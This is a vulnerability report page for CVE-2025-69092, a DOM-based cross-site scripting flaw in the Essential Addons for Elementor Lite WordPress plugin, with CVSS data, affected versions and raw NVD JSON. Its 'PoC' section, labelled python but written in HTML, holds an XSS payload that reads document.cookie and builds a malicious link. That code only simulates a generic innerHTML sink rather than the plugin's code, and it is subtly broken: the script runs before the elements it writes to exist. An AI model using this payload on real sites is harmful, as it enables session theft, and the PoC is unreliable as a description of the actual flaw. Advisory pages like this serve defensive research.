Security Vulnerability Report
中文
CVE-2025-69092 CVSS 6.5 MEDIUM

CVE-2025-69092

Published: 2025-12-30 11:16:03
Last Modified: 2026-01-29 16:48:22

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Essential Addons for Elementor essential-addons-for-elementor-lite allows DOM-Based XSS.This issue affects Essential Addons for Elementor: from n/a through <= 6.5.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:lite:wordpress:*:* - VULNERABLE
Essential Addons for Elementor Lite <= 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69092 DOM-Based XSS PoC --> <!-- Target: Essential Addons for Elementor Lite <= 6.5.3 --> <!-- This PoC demonstrates the DOM-based XSS vulnerability --> <!DOCTYPE html> <html> <head> <title>CVE-2025-69092 PoC</title> </head> <body> <h1>DOM-Based XSS PoC for CVE-2025-69092</h1> <p>Target: Essential Addons for Elementor Lite <= 6.5.3</p> <script> // Simulate the vulnerable code pattern function vulnerableFunction() { // Get user input from URL parameter (simulating plugin behavior) const params = new URLSearchParams(window.location.search); const userInput = params.get('eael_data'); // Vulnerable: Direct injection without sanitization if (userInput) { document.getElementById('output').innerHTML = userInput; } } // XSS Payload const xssPayload = '<img src=x onerror="alert(document.cookie)">'; // Display the attack URL const attackUrl = window.location.origin + '?eael_data=' + encodeURIComponent(xssPayload); document.getElementById('attack-url').innerHTML = '<a href="' + attackUrl + '" target="_blank">Malicious Link</a>'; // Execute vulnerable function vulnerableFunction(); </script> <div id="output"></div> <div id="attack-url"></div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69092", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:02.567", "lastModified": "2026-01-29T16:48:22.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Essential Addons for Elementor essential-addons-for-elementor-lite allows DOM-Based XSS.This issue affects Essential Addons for Elementor: from n/a through <= 6.5.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding": "6.5.4", "matchCriteriaId": "14A667BA-97C7-4237-A58E-55B26EBE47D2"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/essential-addons-for-elementor-lite/vulnerability/wordpress-essential-addons-for-elementor-plugin-6-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}